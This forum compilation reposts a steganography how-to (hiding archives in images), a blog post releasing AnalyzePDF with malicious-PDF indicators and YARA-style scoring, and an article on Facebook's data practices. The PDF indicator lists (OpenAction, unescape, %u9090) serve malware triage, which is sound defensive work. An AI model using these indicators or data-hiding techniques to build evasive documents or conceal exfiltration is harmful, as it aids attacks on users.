[/TD] [/TR] [TR] [TD][/TD] [TD]T4RUPT_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]232K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TAGS_FOR_RELATIVE_SETLOC.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 66K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TIME_OF_FREE_FALL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]118K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TPI_SEARCH.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 91K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCDAPS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]124K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCEXECUTIVE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 46K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCINITIALIZE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 69K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCMASSPROP.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 37K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCRESTARTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCROLLDAP.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]101K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCSTROKETEST.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 42K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UPDATE_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 95K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]WAITLIST.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 86K[/TD] [TD] [/TD] [/TR] [/TABLE] Sursa: Index of /apollo/listings/Comanche055
-
Steganography: The Art of Hiding Information What with all of the spying and whatnot, we all need a private space for those things we do want to hide. Cryptography or encryption can be used to hide content, but it does not hide data from a third party, it makes the data unreadable by a third party. And then there is steganography, the science, or rather, the art of hiding data. You can, for example hide files in an image, like so: The command cat reads the image file (in this case technocracy.jpg) and the compressed directory littlesecrets.tar.gz and then concatenates image and compressed file together in a new file, makeithardertobespiedon.jpg (use any name you like). To get your files back, simply uncompress the makeithardertobespiedon image file. Obviously, combining the two, compressing an encrypted directory and concatenating it in an image file, makes it even harder to be spied on. You can do this yourself, using your chosen encryption scheme, then the above, or you can use a tool. If and when you use a tool, I recommend researching local laws on encryption and its exportation before use. Tools Steghide for example, is a steganography program that is able to hide data in various kinds of image- and audio-files. The color- respectivly sample-frequencies are not changed thus making the embedding resistant against first-order statistical tests. Note that the steghide code is hosted on sourceforge, which was bought by Dice Holdings in 2012. I used the command line for steghide when I experimented with it, but there are graphical front-ends. I haven’t tried those. More tools can be found here (comparison table). My requirements would be: FOSS licensed (preferably GNU licensed) cross-platform (must run on GNU/Linux) support of additional cryptography Detectable? In 2001 Niels Provos searched for images that might contain hidden messages using stegdetect and stegbreak. Like said, we are making it harder. A lot harder. But … For every clever method and tool being developed to hide information in multimedia data, an equal number of clever methods and tools are being developed to detect and reveal its secrets. ~ Cyber Warfare: Steganography vs. Steganalysis (pdf) More on steganography The Black Chamber Detecting Steganographic Content on the Internet (pdf) Computer Forensics, Cybercrime and Steganography Resources: Steganography & Data Hiding – Links & Whitepapers (latest entry from 2008) An Overview of Steganography for the Computer Forensics Examiner Cyber Warfare: Steganography vs. Steganalysis (pdf) Sursa: https://lilithlela.cyberguerrilla.org/?p=6620
-
[h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h] [h=2]What is that thing they call a PDF?[/h] The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (SIO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal. The PDF has become a defacto for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing and but since they're so common they're still a reliable means for a delivery method by malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (to be fair, the sandboxed versions and other security controls these days have helped significantly) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports [h=3]What does a PDF consist of?[/h] In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word in it) we can see a better idea of the contents we'd expect to see: [h=2]What else is out there?[/h] Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may be an overlap of others out there but that's mainly because the results of our research produced similar results or our minds think alike...I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intentions aren't to downplay them and/or their ability to analyze PDF's but rather helping to show reasons I ended up doing what I did. [h=4]pdfid/pdf-parser[/h] Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capability/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as the (-e) which display extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations. During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone. I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '/r' or '/n' behind it, it doesn't seem to count it. I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages/ values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131) There were times when the number of characters after the last '%%EOF' were incorrect Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g - cbf76a32de0738fea7073b3d4b3f1d60) : [h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the files internals. Originally, this tool didn't look match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another users work. [h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but it's power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process. [h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the files structure - which is great if you want to include that into an overall report but again this requires the user to interpret the parsed data [h=4]pdfcop[/h] Pdfcop is part of the Origami framework. There're some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file our right away if there was an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up meaning their Xref tables are first read in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it already was flagged bad but I feel like that's too much of tunnel vision for me. I personally prefer to know more than less...especially if I want to do trending/stats/analytics. [h=2]So why create something new?[/h] While there are a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of those above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there's wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs? [h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger or take them one at a time through one of the above mentioned tools? They're all fine work flows but what if you discover something unique or come across it enough times to create a signature/rule out of so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis one offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too great in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.< I felt it was better to use the characteristics of a malicious file (either known or observed from combinations of within malicious files) to eval what would indicate a malicious file. Instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: A single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF are a high indicator that it's malicious, there're still legitimate reasons for JavaScript to be within a PDF (e.g. - to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires). [h=3]Gathering Stats[/h] At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDF's out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDF's to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note : Spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing). Be aware that you're going to come across files that someone may mark as good but it actually shows signs of badness... always interesting to detect these types of things during testing! [h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this: Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in ""3.4.1, 'File Header' of Appendix H - ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right in the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either: The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration. [*]Get rid of duplicates (based on SHA256 hash) for both files in the same category (clean vs. dirty) then again via the entire data set afterwards to make sure there're no duplicates between the clean and dirty sets. [*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach. [*]Run scans for low hanging fruit/know badness with local A/V||YARA Now that we have a more accurate data set classified: [*]Are all PDFs classified as benign really benign? [*]Are all PDFs classified as malicious really malicious? [h=3]Stats[/h] Files analyzed (no duplicates found between clean & dirty): [TABLE=width: 50%] [TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR] [TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR] [TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR] [TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR] [/TABLE] I've collected more than enough data to put together a paper or presentation but I feel that's been played out already so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies. [h=4]Ah-Ha's[/h] None of the clean files had incorrect file headers/versions There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of it's entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things. The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse? None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid Clean files never had '/Colors > 2^24' above 0 while some dirty files did Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file '/JBIG2Decode' was never above '0' in any clean file '/Launch' wasn't used much in either of the data sets but still more common in the dirty ones Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check) Single page PDF's have a higher likelihood of being malicious - no duh '/OpenAction' is far more common in malicious files [h=4]YARA signatures[/h] I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified. Clean data set: Dirty data set: Signatures that triggered across both data sets: Cool... so we know we have some rules that work well and others that might need adjusting, but they still help! [h=4]What to look for[/h] So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps? Header In addition to being after the first 8 bytes I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version .. however, the above mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers or digging deeper we can correlate the PDF's features/elements to the version number and flag on mismatches. Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together. [h=3]File Identification[/h] In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as: [h=3]Wrap pdfinfo[/h] Through my testing I found this tool to be more reliable in some areas as opposed to pdfid such as: Determining if there're any Xref errors produced when trying to read the PDF Look for any unterminated hex strings etc. Detecting EOF errors [h=3]Wrap pdfid[/h] Read the header. *pdfid will show exactly what's there and not try to convert it* _attempt_ to determine the number of pages Look for object/stream mismatches Not only look for JavaScript but also determine if there's an abnormally high amount Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.) Look for data after EOF Calculate a few different entropy scores Next, perform some automagical checks and hold on to the results for later calculations. [h=3]Scan with YARA[/h] While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There're many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase it's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about: If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed the calculation process starts. This is two phase - Anything noted from pdfino and pdfid are evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing...but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has it's weighted value parsed from the rule and added to the overall score. This helps bump up a files score or immediately flag it as suspicious if you have a rule you really want to alert on. So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640 : [h=3]Download[/h] I've had this code for quite a while and haven't gotten around to writing up a post to release it with but after reading a former coworkers blog post last night I realized it was time to just write something up and get this out there as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to is and get back a "yes it's ok -or- no, sending it for analysis". AnalyzePDF can be downloaded on my github [h=2]Further Reading[/h] Research papers (one | two | three) [PDF] PDFTricks PDF Overview Posted by hiddenillusion at 9:44 PM Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
-
Didn't Read Facebook's Fine Print? Here's Exactly What It Says The Huffington Post | By Amanda Scherker So, like every other one of the world's 1.28 billion monthly active Facebook users, you blindly agreed to Facebook's Terms and Conditions without reading the fine print. You entrusted your photo albums, private messages and relationships to a website without reading its policies. And you do the same with every other site ... sound about right? In your defense, Carnegie Mellon researchers determined that it would take the average American 76 work days to read all the privacy policies they agreed to each year. So you're not avoiding the reading out of laziness; it's literally an act of job preservation. So here are the Cliffs Notes of what you agreed to when you and Facebook entered into this contract. Which, by the way, began as soon as you signed up: Nothing you do on Facebook is private. Repeat: Nothing you do on Facebook is private. Note the rather vague use of the word "infer," which Oxford Dictionary defines as "Deduce or conclude (information) from evidence and reasoning rather than from explicit statements." That includes some things you haven't even done yet. Facebook has even begun studying messages that you type but end up deciding not to post. A recent study by a Facebook data analyst looked at habits of 3.9 million English-speaking Facebook users to analyze how different users "self-censor" on Facebook. They measured the frequency of "aborted" messages or status posts, i.e., posts that were deleted before they ever were published. They studied this because "[Facebook] loses value from the lack of content generation," and they hoped to determine how to limit this kind of self-censorship in the future. While a Facebook spokesman told Slate that the network is not monitoring the actual substance of these messages, Facebook was able to determine when characters were typed, and whether they were posted within ten minutes of being typed. Even if you leave the network, not all your information does. Your Facebook footprint doesn't necessarily disappear if you deactivate your account. According to the site's Statement of Rights and Responsibilities, if your videos or photos have been shared by other users, they will remain visible on the site after you deactivate your account, and are subject to that user's privacy settings. Your information lets Facebook sell the power of your profile to brands and companies. This means that Facebook is being paid for supplying your endorsement (which you indicate by liking a page) to brands or companies. You can even find out how much your data is worth to Facebook by using the FBME application from Disconnect, Inc. And a report from The Center For Digital Democracy shows marketing companies are taking note, creating algorithms for determining key social media "influencers." The report found that many marketers have identified multicultural youth users as key influencers, and have targeted those demographics with heavier social media marketing. You're also giving Facebook the ability to track your web surfing anytime you're logged into the site. This announcement came in a recent post from Facebook. Facebook notes that other websites do the same thing. But that accounts for an insane amount of potential data, especially given the growth of Facebook mobile use. On average, Facebook mobile users check the site 14 times a day on their devices. Facebook also uses strategic partnerships to track your purchases in real life. Last year, Facebook started partnering with data broker firms. Data brokers earn their money by selling the power of your consumer habits and monitoring your online and offline spending. Facebook's partnership allows them to measure the correlation between the ads you see on Facebook and the purchases you make in-store -- and determine whether you're actually buying in real life the things you're seeing digitally while using Facebook. Two of Facebook's partners, Datalogix and Acxiom -- one of the oldest data brokers and a partner of Huffington Post's parent company AOL, Inc., -- were among the nine data brokers the Federal Trade Commission analyzed in a recent in-depth study. The study found that data brokers "collect consumer data from numerous sources, largely without consumers' knowledge" and "store billions of data elements." Acxiom has a database of about 3,000 data segments for nearly every U.S. consumer. Brokers share this information among "multiple layers of data brokers providing data to each other," and then analyze the date to make "potentially sensitive inferences" about the consumer. These sensitive data points could range from health specifics, like high cholesterol, to broader demographic categories -- like the so-called "Urban Scramble," which includes a "high concentration of Latinos and African Americans with low incomes" or the so-called "Rural Everlasting," which includes single men and women over the age of 66 with “low educational attainment and low net worths." Some other examples of data points the FTC noted: Presence of Elderly Parent Presence of Children in Household Birth Dates of Each Child in House Single Parent with Children Ethnic and Religious Affiliations Home Size Market Value Date of Move Gambling - State Lotteries Affluent Baby Boomer Type of Credit Cards Date of Last Travel Purchase Buying Activity Working-Class Mom Buying Channel Preference (e.g., Internet, Mail, Phone) Average Days Between Orders Last Online Order Date Last Offline Order Date Smoker in Household Allergy Sufferer Weight Loss & Supplements Expectant Parent The data collection is difficult to skirt. One Time Magazine reporter went to great lengths to hide her pregnancy from big data; she said her husband ended up looking like a criminal when he went to a drugstore and tried to purchase enough Amazon gift cards to buy a stroller on the website. This kind of ultra-specific marketing also can become eerie. Take the case of Mike Seay, who the LA Times reported received an OfficeMax marketing letter addressed to "Mike Seay, Daughter Killed in Car Crash." OfficeMax said that the information came from a third-party broker, but did not specify which one. Facebook uses all this outside information to target ads to you. This past June, Facebook announced that it would start using data from users' web browsing history to serve targeted advertisements as such: Of course, targeting ads is hardly a new phenomenon; Nielsen started gathering information about radio audiences back in the '30s. But because Facebook has so much information on every user, the kinds of demographics they make available to advertisers are more comprehensive. These are some of the ad target categories that Facebook allows: For example, a company could specify its audience, said Facebook, "to target people who recently moved and are engaged or in a relationship and in the industries of Accounting and Finance." When Facebook introduced its ad targeting, it said, "When we ask people about our ads, one of the top things they tell us is that they want to see ads that are more relevant to their interests." But that explanation doesn't really tell the whole story. While some users may not mind being shown targeted ads to help them pick out a new TV, this example brushes over the full scope of items being marketed to you based on your data. For instance, according to a report from the Center for Digital Democracy, financial service companies have taken to Facebook for "data mining, targeting, and influencing consumers and their networks of friends," and some companies are developing "new leads for their loan and refinance offers" based on users' Facebook behavior. And the finance world is not a small amount of Facebook's advertising platform: According to a Business Insider investigation, Visa, American Express, Capitol One and CitiBank are among the top 35 biggest advertisers on Facebook. When Facebook describes its newly implemented changes, it doesn't seem as eager to discuss the financial plans it might be helping the companies sell you. So who really benefits from these highly targeted ads? For one, Facebook itself. Facebook's ad revenue grew 82 percent from 2013 to the first quarter of 2014, totaling $2.27 billion. Joseph Turow, a professor at the University of Pennsylvania’s Annenberg School for Communication, told the New York Times that this new user tracking is making Facebook one of the fastest-growing advertising companies on the Internet. "It's more likely to help Facebook than you," he said. If you're not very keen on helping Facebook generate more profitable ads at the price of your privacy, Facebook suggests you choose the "x" out option on individual ads. This won't change the data being gathered about your interests, but it should help prevent an influx of credit card ads from popping up on your Facebook. If you want your targeted ads to stop completely, Facebook recommends you use the industry-standard opt-out program from Digital Advertising Alliance. However, those two recommendations have been dismissed by privacy advocates like Jeff Chester, executive director of the Center for Digital Democracy, who called them "a political smokescreen to enable Facebook to engage in more data gathering." FTC chairwoman Edith Ramirez has also urged the wider digital advertising community to create a "more persistent method" of opting out that would give consumers more control. According to a Consumer Reports poll, 85 percent of online consumers oppose Internet ad tracking. Facebook has been rolling out location services that effectively turn mobile phones into location tracking devices. What's next when it come to information gathering by Facebook? TechCrunch spotlighted Facebook's new tracking feature, "Nearby Friends," which is being pitched as an opt-in way to find out which of your friends is located within a mile of you. While you don't receive the exact location of your friends, Facebook receives your exact location. The feature uses "Location Tracking" to create your "Location History." While you can clear your history and turn off the app at will, Facebook noted that it "may still receive your most recent precise location so that you can, for example, post content that's tagged with your location or find nearby places." So some amount of tracking is happening, no matter what. And it plans to use this location data to sell you things. Back when Facebook unveiled "Nearby Friends" in April, a company spokesman conceded to TechCrunch that "at this time [Nearby Friends] is not being used for advertising or marketing, but in the future it will be." It wouldn't be surprising if Facebook did, indeed, begin selling location-based data to marketers. After all, studies confirm that this advertising is very successful at convincing you to buy things. A recent U.K. study conducted by media strategy company Vizeum and direct marketing agency iProspect found that location-based advertising created an "11 percent increase in store visits among more than 172,000 people that were served adverts." This technology is only going to become more sophisticated with the rise of more location-tracking apps that can follow your movements in-store. And, yes, Facebook can use you and your data for research. They say so right... Yeah... right there. Despite that "research clause," you may have been surprised to learn that Facebook experimented on nearly 700,000 Facebook users for one week in the summer of 2012. The site manipulated their News Feeds to prioritize positive or negative content, attempting to determine if emotions spread contagiously through social networks. There was no age restriction on the data, meaning it may have involved users under 18. Cornell researchers then analyzed Facebook's data. The resulting study, published in the Proceedings of the National Academy of Sciences, found that emotional states can be transferred via social networks. Company executive Sheryl Sandberg has since apologized for the study, calling it "poorly communicated." Andrew Ledvina, a former data scientist at Facebook from early 2012 to the summer of 2013, told the Wall Street Journal that Facebook did not have an internal review board monitoring research studies conducted by the data science team. He said that the team had freedom to try nearly any test it desired, so long as it didn't interfere with the user experience. He added that the sheer mass of the experiment's subjects was at times difficult to really comprehend, numbering in the hundreds of thousands of users. As he put it, "You get a little desensitized to it." Forbes points out that the "research" part of the User Data policy was not added until May 2012, while the research was conducted in January of 2012. Facebook data is potentially available to government agencies. Facebook has spoken out about U.S. government information requests it considers unconstitutional. Facebook's Deputy General Counsel Chris Sonderby published a statement last month about the site's legal fight regarding one such search warrant, in which the government requested nearly all data on 381 Facebook users. Only 62 of those searched were charged, in a disability fraud case. He noted that, "We regularly push back on requests that are vague or overly broad." But Facebook's second Global Government Requests Report showed that when the U.S. government asks, Facebook hands over at least some user data in more than 80 percent of cases: And if you actually think you know what you've agreed to, remember that Facebook maintains the right to change its mind about user conditions at any time. Basically, if you're still using Facebook, you're agreeing. After the site unveiled its new, more aggressive approach to targeted advertising in June, a Facebook spokesman told the Wall Street Journal, "We routinely discuss product and policy updates with our regulators -- the FTC and the Irish DPC -- and this time is no different. While we are not required to notify nor seek approval from regulators before we make changes, we do keep them informed and answer any questions they may have." It's clear that the meaning of privacy is changing drastically in the digital age. While Facebook may be one of the agents of change in drafting a new definition, it's certainly not the only one. As standards of privacy continue to morph, knowledge remains your best weapon in protecting yourself and your information. We recommend checking out the documentary "Terms And Conditions May Apply" for an in-depth look at privacy in the digital age. Common Sense Media also offers helpful guidelines for protecting your and your children's privacy online. Sursa: Didn't Read Facebook's Fine Print? Here's Exactly What It Says
-
